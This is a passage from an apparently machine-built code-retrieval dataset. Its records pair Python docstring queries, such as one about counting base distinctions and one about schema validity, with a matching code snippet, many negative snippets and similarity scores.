self._twist == 1:\n n = self._rank - 1\n if n%2==1:\n return binomial( 2*n-1, n-1 )\n else:\n return binomial( 2*n-1, n-1 ) + binomial( n-1, n//2 -1 )\n\n # type BC (affine)\n elif self._letter == 'BC':\n # this formula is not yet proven\n print(Warning(\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if self.is_affine():\n if self._twist == 1:\n n = self._rank - 1\n return binomial( 2*n, n )\n\n # types BD and CD (affine)\n elif self._letter in ['BD','CD']:\n # this formula is not yet proven\n print(Warning(\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if self.is_affine():\n if self._twist == 1:\n n = self._rank - 2\n return 2*binomial( 2*n, n )\n\n # type D (finite and affine)\n elif self._letter == 'D':\n # the formula is taken from Bastian, Prellberg, Rubey, Stump\n if self.is_finite():\n if self._rank == 4:\n return 6\n else:\n f = Euler_Phi()\n n = ZZ(self._rank)\n return sum( f( n//k ) * binomial( 2*k, k )\n for k in n.divisors() ) // (2*n)\n # this formula is not yet proven\n elif self.is_affine():\n n = self._rank - 3\n if n == 2:\n return 9\n else:\n print(Warning (\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if n%2==1:\n return 2*binomial(2*n,n)\n else:\n return 2*binomial(2*n,n) + binomial(n, n//2)\n\n # the exceptional types are hard-coded\n # type E (finite, affine and elliptic)\n elif self._letter == 'E':\n if self.is_finite():\n if self._rank == 6:\n return 67\n elif self._rank == 7:\n return 416\n elif self._rank == 8:\n return 1574\n elif self.is_affine():\n if self._rank == 7:\n return 132\n elif self._rank == 8:\n return 1080\n elif self._rank == 9:\n return 7560\n elif self.is_elliptic():\n if self._rank == 8:\n return 49\n elif self._rank == 9:\n return 506\n elif self._rank == 10:\n return 5739\n\n # type F\n elif self._letter == 'F':\n if self.is_finite():\n return 15\n elif self.is_affine():\n return 60\n elif self.is_elliptic():\n if self._twist == [1,2]:\n return 90\n if self._twist == [1,1] or self._twist == [2,2]:\n return 35\n\n # type G\n elif self._letter == 'G':\n if self.is_finite():\n return 2\n elif self.is_affine():\n return 6\n elif self.is_elliptic():\n if self._twist == [1,3]:\n return 7\n if self._twist == [1,1] or self._twist == [3,3]:\n return 2\n\n # type X\n elif self._letter == 'X':\n if self._rank == 6:\n return 5\n elif self._rank == 7:\n return 2\n\n # otherwise the size is returned to be unknown\n else:\n print(\"Size unknown\")\n return NotImplemented",
"def get_effect_size(self):\n\n # search the xls file\n f = glob.glob(os.path.join(self.output, '*_peaks.xls'))\n if not os.path.exists(f[0]):\n raise ValueError('file missing in macs2 callpeak output: %s' % f)\n\n # top\n topN = 100\n counter = 0\n dep = {}\n # ip_depth = ip_scale = input_depth = input_scale = 0\n with open(f[0], 'rt') as fi:\n for line in fi:\n if not line.startswith('#'): \n continue\n if counter > 100: # nrows\n break # stop\n num = line.strip().split()[-1]\n if 'tags after filtering in treatment' in line:\n dep['ip_depth'] = num\n if 'tags in treatment' in line:\n s = 1e6 / int(num)\n dep['ip_scale'] = '%.6f' % s\n if 'tags after filtering in control' in line:\n dep['input_depth'] = num\n if 'tags in control' in line:\n s = 1e6 / int(num)\n dep['input_scale'] = '%.6f' % s\n counter += 1\n\n return dep",
"def main(n_samples):\n uso = usolib.uso.uar(N)\n lst = [usolib.randomfacet.randomfacet_sample(uso, N) for i in range(n_samples)]\n return sum(lst) / float(n_samples)",
"def mh(N, disttype):\n xs = np.array([])\n ys = np.array([])\n pos_now = (0,0)\n accept = 0\n for i in range(N):\n pos_cand = proposal_pdf(pos_now)\n prob_stay = target_pdf(pos_now, disttype)\n prob_move = target_pdf(pos_cand, disttype)\n if prob_move / prob_stay > np.random.uniform(0,1,1):\n pos_now = pos_cand\n xs = np.append(xs, pos_now[0])\n ys = np.append(ys, pos_now[1])\n accept += 1\n return xs, ys, accept/N",
"def pdf(self,x):\n return self.categoricalDist.pdf(x)",
"def analyse_type(self):\n \n t = \" \" # Holder string\n \n data_base = '/local/duman/SIMULATIONS/many_polymers_5/density_0.2/kappa_'\n path = data_base + str(self.k) + '/fp_' + str(self.f) + '/CLUSTER/avg_size.txt'\n if os.path.exists(path):\n data = np.loadtxt(path, dtype=float)\n else:\n data = 10.\n self.cs = data\n print path\n print data\n if data < 12.:\n t = \"gas\"\n elif data > 200.:\n t = \"giant\"\n else:\n t = \"cluster\"\n\n self.type = t # Type of point\n \n return",
"def main(duck, abstract, answer):\n set_duck = sorted(set(duck))\n for i in set_duck:\n if i > abstract / 2:\n break\n answer += duck.count(abstract - i) * duck.count(i)\n print(answer)",
"def get_perfect_information(self):\n raise NotImplementedError",
"def overrepresented_units(distribution, classes=None):\n # Regroup into classes if specified. Otherwise return categories indicated\n # in the data\n if not classes:\n classes = return_categories(distribution) \n\n\n ## Compute the representation of the different classes in all areal units\n rep = mb.representation(distribution, classes)\n\n ## Find the tracts where classes are overrepresented\n areal_units = {cl:[au for au in rep\n if rep[au][cl][0] > 1 + 2.57*math.sqrt(rep[au][cl][1])] \n for cl in classes}\n\n return areal_units"
] | [
"0.5700454",
"0.5624713",
"0.5599203",
"0.5592559",
"0.5505562",
"0.54669946",
"0.5466142",
"0.5449652",
"0.5400594",
"0.5398503",
"0.5343119",
"0.53286606",
"0.5312603",
"0.53101563",
"0.5294233",
"0.5283371",
"0.5280055",
"0.5267188",
"0.5262132",
"0.52526665",
"0.52496",
"0.5247098",
"0.52160513",
"0.52129257",
"0.5209133",
"0.52085245",
"0.5191606",
"0.51834834",
"0.5173392",
"0.51689976",
"0.51591647",
"0.5156737",
"0.5146902",
"0.5124393",
"0.5113049",
"0.51130044",
"0.5108708",
"0.5101223",
"0.510014",
"0.5098962",
"0.5087103",
"0.5083366",
"0.5078981",
"0.5068852",
"0.5062866",
"0.5057589",
"0.5054177",
"0.5053933",
"0.5049696",
"0.50486195",
"0.5048018",
"0.5048018",
"0.5048018",
"0.5048018",
"0.5045074",
"0.5044782",
"0.5040426",
"0.5040209",
"0.50333107",
"0.5025258",
"0.50246274",
"0.50243723",
"0.50240123",
"0.5016171",
"0.5011604",
"0.5009827",
"0.5002872",
"0.50005734",
"0.499256",
"0.49882713",
"0.49871576",
"0.498406",
"0.4980655",
"0.49775207",
"0.49713632",
"0.49664104",
"0.49661213",
"0.4963444",
"0.49608544",
"0.49536362",
"0.49522933",
"0.4950424",
"0.49500528",
"0.4948499",
"0.49478605",
"0.49430943",
"0.49406955",
"0.49326587",
"0.4927374",
"0.4926765",
"0.49257797",
"0.49249467",
"0.4923614",
"0.49228027",
"0.4919107",
"0.49174517",
"0.49173394",
"0.49161148",
"0.49137568",
"0.49130043"
] | 0.6394095 | 0 |
For a conjugate distinction return the number of base distinctions it needs to operate, and expects in the constructor. | def getNumberOfBaseDistinctionsNeeded():
raise AbstractMethodException(Distinction) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def conjugate(self, ???):",
"def num_conll(self):\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self):\n pass",
"def size_conjugacy_class(partition,n):\r\n aux1=1\r\n c=0\r\n aux=partition[0]\r\n flag = 1\r\n for j in range(len(partition)):\r\n if (aux == partition[j]):\r\n c = c + 1\r\n flag = 1\r\n else:\r\n aux1 = aux1*(partition[j-1]**c)*(math.factorial(c))\r\n aux = partition[j]\r\n c = 1\r\n flag = 0\r\n if (flag == 1):\r\n aux1 = aux1*(partition[j-1]**c)*(math.factorial(c))\r\n else: \r\n aux1 = aux1*(partition[j]**c)*(math.factorial(c))\r\n card = (math.factorial(n))/aux1\r\n return int(card)",
"def conjugate(self):\r\n return self.__class__(self._real, -self._imag)",
"def factor(self, conj=False):\n raise NotImplementedError()",
"def _compute_pico_concentration(dna_vals, size=500):\n lib_concentration = (dna_vals / (660 * float(size))) * 10**6\n\n return lib_concentration",
"def get_conjugate_bases_of(chebi_ent):\n if hasattr(chebi_ent, 'OntologyParents'):\n return [ent.chebiId for ent in chebi_ent.OntologyParents if\n (ent.type == \"is conjugate base of\")]\n else:\n return []",
"def conjugate(self, x):\n\n a = self.array_form\n b = x.array_form\n n = len(a)\n if len(b) != n:\n raise ValueError(\"The number of elements in the permutations \\\ndon\\'t match.\")\n invb = [None]*n\n for i in xrange(n):\n invb[b[i]] = i\n return _new_from_array_form([invb[a[i]] for i in b])",
"def cardinality(self):\n from sage.arith.all import binomial\n n = self._size\n if n == 0:\n return Integer(1)\n return (2 * binomial(4 * n + 1, n - 1)) // (n * (n + 1))\n # return Integer(2 * factorial(4*n+1)/(factorial(n+1)*factorial(3*n+2)))",
"def num_clbits(self):\n return 0",
"def __init__(self):\n GinacFunction.__init__(self, \"conjugate\",\n conversions=dict(sympy='conjugate'))",
"def NumCoefficients(self):\n return nchoosek(self.degree + self.dimension, self.degree, exact=True)",
"def class_size(self):\n if not self.is_mutation_finite():\n return infinity\n else:\n components = []\n multiplicities = []\n for x in self.irreducible_components():\n if components.count(x) == 0:\n components.append(x)\n multiplicities.append(1)\n else:\n y = components.index(x)\n multiplicities[y] = multiplicities[y]+1\n\n sizes = [ x.class_size() for x in components ]\n if NotImplemented in sizes:\n print(\"Size unknown\")\n return NotImplemented\n else:\n return prod( [binomial(sizes[i]+multiplicities[i]-1,\n multiplicities[i] ) for i in range (0,len(sizes))])",
"def conjugate(self):\n return self.__class__(scalar=self.scalar, vector= -self.vector)",
"def nC(self):\n return int(self._n.prod())",
"def n_components(self):\n return 1",
"def n_complex_components(self):\n return self.n_components // 2 + (self.n_components % 2)",
"def concentration(self):\n return self._gev_bijector.concentration",
"def conjugate(self):\n return Complex(self._reNum, -self._imNum)",
"def conjugate(x):\n if len(list(x.size())) == 2:\n z = torch.zeros(2, x.size()[1], dtype=torch.double, device=x.device)\n z[0] = x[0]\n z[1] = -x[1]\n\n if len(list(x.size())) == 3:\n z = torch.zeros(\n 2, x.size()[2], x.size()[1], dtype=torch.double, device=x.device\n )\n z[0] = torch.transpose(x[0], 0, 1)\n z[1] = -torch.transpose(x[1], 0, 1)\n\n return z",
"def get_cnu(nu_min, nu_max, n_nu):\n ## Frequency grids; border, difference, centre [b, d, c]\n bnu = nu_min * (nu_max/nu_min)**(np.arange(n_nu+1)/float(n_nu))\n #dnu = bnu[1:] - bnu[0:n_nu]\n cnu = np.sqrt( bnu[1:] * bnu[0:n_nu] )\n return cnu",
"def nC(self):\n return int(self.vnC.prod())",
"def class_size(self):\n if not self.is_mutation_finite():\n return infinity\n\n # type A (finite and affine)\n if self._letter == 'A':\n # the formula is taken from Torkildsen - Counting\n # cluster-tilted algebras of type A\n if self.is_finite():\n n = self._rank\n a = binomial( 2*(n+1), n+1 ) // (n+2)\n if n % 2 == 1:\n a += binomial( n+1, (n+1)//2 )\n if n % 3 == 0:\n a += 2 * binomial( 2*n//3, n//3 )\n return a // (n+3)\n # the formula is taken from Bastian, Prellberg, Rubey, Stump\n elif self.is_affine():\n i,j = self._bi_rank\n i = ZZ(i)\n j = ZZ(j)\n n = i+j\n f = Euler_Phi()\n if i == j:\n return ( binomial( 2*i,i ) +\n sum( f(k) * binomial(2*i//k,i//k)**2\n for k in [k for k in i.divisors()\n if k in j.divisors()] ) // n ) // 4\n else:\n return sum( f(k) * binomial(2*i//k,i//k) *\n binomial(2*j//k,j//k)\n for k in [k for k in i.divisors()\n if k in j.divisors()] ) // ( 2 * n )\n\n # types B and C (finite and affine)\n elif self._letter in ['B', 'C']:\n # this formula is proven but nowhere published correctness\n # is clear enough that I don't think a warning is needed\n if self.is_finite():\n n = self._rank\n return binomial(2 * n, n) // (n + 1)\n\n elif self._letter in ['BB','CC']:\n # these two formulas are not yet proven\n print(Warning(\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if self.is_affine():\n if self._twist == 1:\n n = self._rank - 1\n if n%2==1:\n return binomial( 2*n-1, n-1 )\n else:\n return binomial( 2*n-1, n-1 ) + binomial( n-1, n//2 -1 )\n\n # type BC (affine)\n elif self._letter == 'BC':\n # this formula is not yet proven\n print(Warning(\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if self.is_affine():\n if self._twist == 1:\n n = self._rank - 1\n return binomial( 2*n, n )\n\n # types BD and CD (affine)\n elif self._letter in ['BD','CD']:\n # this formula is not yet proven\n print(Warning(\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if self.is_affine():\n if self._twist == 1:\n n = self._rank - 2\n return 2*binomial( 2*n, n )\n\n # type D (finite and affine)\n elif self._letter == 'D':\n # the formula is taken from Bastian, Prellberg, Rubey, Stump\n if self.is_finite():\n if self._rank == 4:\n return 6\n else:\n f = Euler_Phi()\n n = ZZ(self._rank)\n return sum( f( n//k ) * binomial( 2*k, k )\n for k in n.divisors() ) // (2*n)\n # this formula is not yet proven\n elif self.is_affine():\n n = self._rank - 3\n if n == 2:\n return 9\n else:\n print(Warning (\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if n%2==1:\n return 2*binomial(2*n,n)\n else:\n return 2*binomial(2*n,n) + binomial(n, n//2)\n\n # the exceptional types are hard-coded\n # type E (finite, affine and elliptic)\n elif self._letter == 'E':\n if self.is_finite():\n if self._rank == 6:\n return 67\n elif self._rank == 7:\n return 416\n elif self._rank == 8:\n return 1574\n elif self.is_affine():\n if self._rank == 7:\n return 132\n elif self._rank == 8:\n return 1080\n elif self._rank == 9:\n return 7560\n elif self.is_elliptic():\n if self._rank == 8:\n return 49\n elif self._rank == 9:\n return 506\n elif self._rank == 10:\n return 5739\n\n # type F\n elif self._letter == 'F':\n if self.is_finite():\n return 15\n elif self.is_affine():\n return 60\n elif self.is_elliptic():\n if self._twist == [1,2]:\n return 90\n if self._twist == [1,1] or self._twist == [2,2]:\n return 35\n\n # type G\n elif self._letter == 'G':\n if self.is_finite():\n return 2\n elif self.is_affine():\n return 6\n elif self.is_elliptic():\n if self._twist == [1,3]:\n return 7\n if self._twist == [1,1] or self._twist == [3,3]:\n return 2\n\n # type X\n elif self._letter == 'X':\n if self._rank == 6:\n return 5\n elif self._rank == 7:\n return 2\n\n # otherwise the size is returned to be unknown\n else:\n print(\"Size unknown\")\n return NotImplemented",
"def _get_concentration(self, state):\n return self.fc(state.float_features).exp() + self.EPSILON",
"def number_of_bits(self) -> int:\n raise NotImplementedError('To be Overidden by the derived class')",
"def nClumps(self):\n \n return len(self)",
"def conj(z):",
"def conjugate(self):\n parts = list(self)\n # Destroy the diagram column by column, adding each column\n # to the new partition\n eat_diagram = [\n [x - k for x in parts if x - k > 0] for k in range(parts[0])]\n conj_part = [len(y) for y in eat_diagram]\n B = BosonicPartitions()\n return B(conj_part)",
"def number_of_connectives(formula):\n pass\n # ======== YOUR CODE HERE ========",
"def num_frac_bits(self):\n raise NotImplementedError(\"subclasses need to override this method\")",
"def nCr():\n return math.factorial(self.nn) / (math.factorial(self.rr) * math.factorial(self.nn - self.rr))",
"def calc_chromatic_coupling(self):\n raise NotImplementedError('Chromatic Coupling is not Implemented yet.')",
"def conjugate(A):\n if A.is_complex():\n return A.conj()\n return A",
"def conj(x, *args, **kwargs):\n raise NotImplementedError",
"def n_cs(self):\n return np.size(self._cs, 0)",
"def n_cf(self):\n return np.size(self._ref_ii, 0)",
"def conjugate(self):\n v = zeros_como(self)\n for x in range(self.n):\n v[x] = (self[x]).conjugate()\n\n return v",
"def num_cochains(self) -> int:\n if self.__num_cochains__ is not None:\n return self.__num_cochains__\n return self.ptr.numel() + 1",
"def calculate_mcs(self):\n if self.support == 0:\n return 0\n\n e = 1/(self.sup_a*self.sup_c) + 1/(self.sup_a*(self.n-self.sup_c)) + 1/((self.n-self.sup_a)*self.sup_c) + 1/((self.n-self.sup_a)*(self.n-self.sup_c))\n mcs = (min(self.sup_a, self.sup_c) - self.sup_a * self.sup_c / self.n)**2 * self.n * e\n return mcs",
"def conj(self):\n res = self._defer_unary_elementwise(np.conj)\n res.dirs = list(map(opr.neg, res.dirs))\n res.charge = -res.charge\n if self.qodulus is not None:\n res.charge %= res.qodulus\n return res",
"def _num_conn_comp(graph):\n\n return nx.number_connected_components(graph)",
"def __init__(self):\n super().__init__()\n self.n = 0.0\n self.p = 0.0\n self.type = 'Binomial'\n self.hasInfiniteBound = True\n self.distType = 'Discrete'\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'",
"def number_strongly_connected_components(G):\n return len(strongly_connected_components(G))",
"def derivitive(x):\n return x * 1",
"def conjugate(self):\n return self.rotate().dagger()",
"def convex_conj(self):\n return IndicatorNuclearNormUnitBall(\n self.domain,\n conj_exponent(self.outernorm.exponent),\n conj_exponent(self.pwisenorm.exponent))",
"def binomC(k,n):\n return np.double( comb(n, k, exact=1) )",
"def conjugate(self) -> np.ndarray:\n if self.scalar_vector:\n return self.array*np.array([1.0, -1.0, -1.0, -1.0])\n return self.array*np.array([-1.0, -1.0, -1.0, 1.0])",
"def n(self):\n raise NotImplementedError",
"def _qsd_l2_cx_count(self, n):\n return 9 / 16 * 4**n - 3 / 2 * 2**n",
"def cardinality_bit_delta(self,c0, c1):\n c0_bits = self.number_bits_in_cardinality(c0)\n c1_bits = self.number_bits_in_cardinality(c1)\n\n return int(math.fabs(c1_bits - c0_bits))",
"def dim(self) -> int:",
"def csize(grades):\n\tp = 0\n\tfor k in grades:\n\t\tl = _comb(n,k)\n\t\tp += l\n\treturn p",
"def csize(grades):\n\tp = 0\n\tfor k in grades:\n\t\tl = _comb(n,k)\n\t\tp += l\n\treturn p",
"def factor_carga(self):\r\n return self.nelementos() / self.n",
"def conjugate(quats):\n res = np.zeros(quats.shape)\n res[:,0]=quats[:,0]\n res[:,1]=-quats[:,1]\n res[:,2]=-quats[:,2]\n res[:,3]=-quats[:,3]\n \n return res",
"def size_in(self):\n if isinstance(self.ensemble.neuron_type, Direct):\n # This will prevent users from connecting/probing Direct neurons\n # (since there aren't actually any neurons being simulated).\n return 0\n return self.ensemble.n_neurons",
"def conj(q):\n q = np.array([q[0]])\n q[0,1]=-q[0,1]\n q[0,2]=-q[0,2]\n q[0,3]=-q[0,3]\n complexconjugate = quatreal(q)\n return complexconjugate",
"def proximal(self):\n if self.exponent == np.inf:\n return proximal_cconj_l1(space=self.domain)\n elif self.exponent == 2:\n return proximal_cconj_l2(space=self.domain)\n else:\n raise NotImplementedError('`gradient` only implemented for p=2 or '\n 'p=inf')",
"def bic(self):\n return np.log(self.sample_size) * self.number_of_parameters() - 2*self.ll[-1]",
"def con_ceq(x,project):\n \n cons = project.con_ceq(x)\n \n if cons: cons = array(cons)\n else: cons = zeros([0])\n \n return cons",
"def GetConcBeer(Abs, epsilon, pathLength):\n return Abs / (epsilon * pathLength)",
"def getAnsofBase(length, base):\n ans = 1\n for i in range(length-1):\n ans = ans * base + 1\n return ans",
"def calc_cophenetic_coeff(self):\n c, d = cophenet(self.__linkage, self.__distance_matrix)\n return round(c, 3)",
"def num_qubits(self) -> int:\n raise NotImplementedError()",
"def clebsch_gordan((J1,M1),(J2,M2),(J3,M3)):\n cg=(-1)**(J2-J1-M3)*math.sqrt(2*J3+1)*pygsl.sf.coupling_3j(int(2*J1), int(2*J2), int(2*J3), int(2*M1), int(2*M2),int(-2*M3))[0]\n #\n return cg",
"def __len__(self):\n num_x, num_y = self.conv_dims()\n return num_x * num_y",
"def _ncc_c(x, y):\r\n den = np.array(norm(x) * norm(y))\r\n den[den == 0] = np.Inf\r\n\r\n x_len = len(x)\r\n fft_size = 1 << (2*x_len-1).bit_length()\r\n cc = ifft(fft(x, fft_size) * np.conj(fft(y, fft_size)))\r\n cc = np.concatenate((cc[-(x_len-1):], cc[:x_len]))\r\n return np.real(cc) / den",
"def __calc_concentration(self, diam, data, dmin, dmax):\n\n dp = np.log10(diam*1e-9)\n conc = data # smoothed\n dmin = np.max((np.log10(dmin),dp[0]))\n dmax = np.min((np.log10(dmax),dp[-1]))\n dpi = np.arange(dmin,dmax,0.001)\n conci = np.sum(interp1d(dp,conc,kind='nearest')(dpi)*0.001,axis=1)\n return conci",
"def chebint(self, a, b, c, n):\n sum = 0.0\n fac = 1.0\n con = 0.25 * (b - a) # factor that normalizes the interval\n cint = numpy.zeros(n)\n for j in range(1, n - 2):\n cint[j] = con * (c[j - 1] - c[j + 1]) / j\n sum = sum + fac * cint[j]\n fac = - fac\n cint[n - 1] = con * c[n - 2] / (n - 1)\n sum = sum + fac * cint[n - 1]\n cint[0] = 2.0 * sum # set constant of integration.\n return (cint)",
"def number_weakly_connected_components(G):\n return sum(1 for wcc in weakly_connected_components(G))",
"def combinations(n) -> float:\r\n c = math.factorial(n) / (math.factorial(2) * math.factorial(n - 2))\r\n return c",
"def num_quadrature_points(self) -> int:",
"def n(self):\n if not self.table:\n return 0\n return max(self.omega) + 1",
"def num_cones(self):\n return self._shape_count(_sff.cone)",
"def number_of_constituents(bc_class):\n num_trn = 0\n cn = bc_class.constituent_properties\n if cn.salinity:\n num_trn += 1\n if cn.temperature:\n num_trn += 1\n if cn.vorticity:\n num_trn += 1\n if not cn.general_constituents.empty:\n num_trn += len(cn.general_constituents.index)\n if not cn.sand.empty:\n num_trn += len(cn.sand.index)\n if not cn.clay.empty:\n num_trn += len(cn.clay.index)\n return num_trn",
"def calc_process_coupling_cohesion_ratio(partitions, graph):\n cp = calc_process_coupling(partitions, graph)\n ch = calc_process_cohesion(partitions, graph)\n if cp == 0 or ch == 0:\n pccr = 0\n else:\n pccr = cp / ch\n return float(pccr)",
"def number_of_basis(self):\n return self._pre_kernel.shape[0]",
"def conjgradient(x, p, gprev, gnew):\r\n gnew = np.array(gnew)[np.newaxis]\r\n gprev = np.array(gprev)[np.newaxis]\r\n gnew = gnew.T\r\n gprev = gprev.T\r\n beta = (gnew.T)@gnew/((gprev.T)@gprev)\r\n gnew = gnew.flatten()\r\n beta = beta.flatten()\r\n p = -gnew + beta*p\r\n return p",
"def gates_per_clifford(qobj_list, clifford_length, basis, qubits):\n\n #TO DO\n\n pass",
"def g(i):\n return int(np.log2(gc(i)^gc(i+1)))",
"def preCondConjugateGradientSolver(b, x, linsys_setup, eps, i_max, plotInterval, mapDir):\n datamaps, ninvs, beams, freqs, power_2d, precond_2d, clumaps, g_nu, \\\n map_prop = linsys_setup\n nx, ny, pixScaleX, pixScaleY = map_prop\n nCluster = len(clumaps[0])\n ksz = False\n if len(clumaps)==2: ksz=True\n \n \n # Calculate residual r = b - (A^-1) x\n r = b - applyMat(x, linsys_setup)\n d = r\n\n\n delta_new = numpy.inner(r,r)\n \n\n\n\n delta_o = delta_new\n delta_array = numpy.zeros(shape=(i_max))\n \n # Iterate CG solver until converged\n i = 0\n #i_max = 300\n while (i < i_max) and (delta_new > delta_o*eps**2.):\n if i==0: t = time.time()\n \n if i%plotInterval == 0 and i != 0:\n print \"\\tNumber of iterations in the CG:\", i\n x0 = x[:nx*ny] # CMB\n x1 = x[nx*ny:nx*ny+1] # Monopole\n x2 = x[nx*ny+1:nx*ny+1+nCluster] # TSZ\n if ksz: x3 = x[nx*ny+1+nCluster:nx*ny+1+2*nCluster]\n print \"\\tMonopole:\", x1\n print \"\\tTSZ:\", x2\n if ksz: print \"\\tKSZ:\", x3\n \n x0.shape = (ny,nx)\n a_l = numpy.fft.fft2(x0)\n a_l *= precond_2d\n x_test = numpy.real(numpy.fft.ifft2(a_l))\n plot(x_test,mapDir+'/CMB_%d.png'%i,'Reconstructed CMB', range=(-250., 250.))\n print delta_new, delta_o*eps**2.\n\n q = applyMat(d, linsys_setup)\n alpha = delta_new / (numpy.inner(d,q))\n x += alpha * d\n\n # What does this do? It's always false.\n if i/50. < numpy.int(i/50):\n r = b - applyMat(x, linsys_setup)\n else:\n r = r - alpha*q\n \n delta_old = delta_new\n delta_new = numpy.inner(r,r)\n beta = delta_new/delta_old\n d = r + beta * d\n #if i==0: print \"\\tEach iteration takes:\", time.time()-t\n i += 1\n\n x0 = x[:nx*ny].reshape((ny, nx))\n x1 = x[nx*ny:nx*ny+1]\n x2 = x[nx*ny+1:nx*ny+1+nCluster]\n if ksz:\n x3 = x[nx*ny+1+nCluster:nx*ny+1+2*nCluster]\n else:\n x3 = None\n \n a_l = numpy.fft.fft2(x0) * precond_2d\n x0 = numpy.real(numpy.fft.ifft2(a_l))\n\n \n # CMB, monopole, TSZ, KSZ\n return x0, x1, x2, x3",
"def getNchan(self):\n return self.shape(squeeze=False)[2]"
] | [
"0.64773166",
"0.6208632",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6194198",
"0.6151681",
"0.59326756",
"0.57995605",
"0.5736376",
"0.57172483",
"0.56418824",
"0.56189567",
"0.5617056",
"0.56133074",
"0.5544068",
"0.5518845",
"0.5512459",
"0.5510861",
"0.5497847",
"0.54915833",
"0.5452297",
"0.5414389",
"0.54006386",
"0.53961194",
"0.53868425",
"0.53867835",
"0.53748757",
"0.5370777",
"0.5368838",
"0.5362584",
"0.5321145",
"0.5315969",
"0.5307401",
"0.52974194",
"0.52968496",
"0.5282425",
"0.5270975",
"0.5260923",
"0.52567816",
"0.52294683",
"0.5225834",
"0.5225158",
"0.52087206",
"0.5166774",
"0.5160155",
"0.5160097",
"0.5144479",
"0.5133213",
"0.51242626",
"0.5118077",
"0.5107299",
"0.5106225",
"0.5105231",
"0.5104786",
"0.5099496",
"0.5098425",
"0.5076469",
"0.5076469",
"0.50547254",
"0.50510764",
"0.50482404",
"0.5045521",
"0.5040215",
"0.503754",
"0.5017839",
"0.5010152",
"0.5000853",
"0.49967533",
"0.49966928",
"0.4994813",
"0.4991778",
"0.4988773",
"0.4984413",
"0.49843803",
"0.4983678",
"0.49811283",
"0.49788833",
"0.49752593",
"0.4973031",
"0.497303",
"0.49717408",
"0.4967934",
"0.4966413",
"0.49574354",
"0.49563715",
"0.4950946",
"0.49492103"
] | 0.56668746 | 23 |
Given a schema return True if this type of distinction is valid for the schema. Default is True. Should be overridden if there are any schemas a distinction is not valid for. | def isValidForSchema(schema):
return True | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def is_a_dde_schema(self, schema):\n return schema in self.registered_dde_schemas",
"def compatibleSchema(self,\n schema: schemaconverter.TDXSchema,\n raise_error: bool = True\n ) -> bool:\n db_tdx_schema = self.tdx_schema\n # see https://stackoverflow.com/a/41579450/10149169\n is_subset = db_tdx_schema.items() <= schema.items()\n if not is_subset and raise_error:\n raise ValueError((\n \"The given database schema is not compatible with the\"\n \" existing database schema. The given schema was {}\"\n \" but the existing schema was {}\").format(\n schema, db_tdx_schema))\n return is_subset",
"def is_a_dde_schema(schema):\n return schema in registered_dde_schemas()",
"def validate_schema(self, schema):\n json_schema_path = os.path.join(_ROOT, 'data', 'schema.json')\n json_schema = load_json_or_yaml(json_schema_path)\n return validate(schema, json_schema)",
"def schemaIsValid(self):\n ret = libxml2mod.xmlSchemaIsValid(self._o)\n return ret",
"def has_schema_url(self):\n return self.get_schema_url() is not None",
"def can_access_schema(self, datasource: \"BaseDatasource\") -> bool:\n\n return (\n self.can_access_all_datasources()\n or self.can_access_database(datasource.database)\n or self.can_access(\"schema_access\", datasource.schema_perm or \"\")\n )",
"def is_schema_types_valid(self):\n valid_types = {\"string\", \"int\", \"float\", \"datetime\", \"boolean\"}\n invalid_types = []\n if self.schema_content:\n for dataset in self.schema_content:\n attributes = self.schema_content.get(dataset)\n for attr in attributes.values():\n type_to_validate = attr.get(\"type\")\n if type_to_validate not in valid_types:\n invalid_types.append(type_to_validate)\n\n if invalid_types:\n error_message, error_code = Errors.modeling_rule_schema_types_invalid(\n invalid_types\n )\n if self.handle_error(\n error_message, error_code, file_path=self.file_path\n ):\n self._is_valid = False\n return False\n return True",
"def is_schema_valid(self, schema):\n for k, v in schema.items():\n if v[0] == \"var_len\":\n assert len(v) == 2\n assert v[1] in TF_VALUE\n\n if v[0] == \"fixed_len\":\n assert len(v) == 3\n assert v[1] in TF_VALUE\n assert isinstance(v[2], list)",
"def schema_valid(arch, **kwargs):\n validator = relaxng(arch.tag)\n if validator and not validator.validate(arch):\n result = True\n for error in validator.error_log:\n _logger.error(tools.ustr(error))\n result = False\n return result\n return True",
"def equals(self, other: Schema) -> bool:\n if not isinstance(other, Schema):\n raise TypeError(\n f\"invalid equality comparison between Schema and {type(other)}\"\n )\n return self.__cached_equals__(other)",
"def equals(self, other: Schema) -> bool:\n if not isinstance(other, Schema):\n raise TypeError(\n f\"invalid equality comparison between Schema and {type(other)}\"\n )\n return self.__cached_equals__(other)",
